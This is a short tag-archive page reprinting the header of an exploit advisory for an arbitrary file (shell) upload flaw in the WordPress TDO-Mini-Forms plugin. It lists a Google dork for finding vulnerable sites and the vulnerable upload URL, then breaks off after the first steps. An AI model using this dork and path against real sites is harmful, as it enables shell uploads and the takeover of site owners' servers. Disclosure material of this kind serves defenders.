Tags archives: forms

 

 

 

0

WordPress TDO-Mini-Forms Shell Upload

############################################################### # Exploit Title: Wordpress TDO-Mini-Forms Plugin Arbitrary File Upload Vulnerability # Author: Ashiyane Digital Security Team # Date: 12/09/2013 # Vendor Homepage: http://thedeadone.net # Software Link : http://cznic.dl.sourceforge.net/project/filip/wordpress/tdo-mini-forms.0.13.9.zip # Google dork: inurl:/wp-content/plugins/tdo-mini-forms/ # Tested on: Windows/Linux ###############################################################   1)Exploit : = = = = = = 1.Go to http:// [target]/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=[ID]&index= 2.Click To Browse And [...]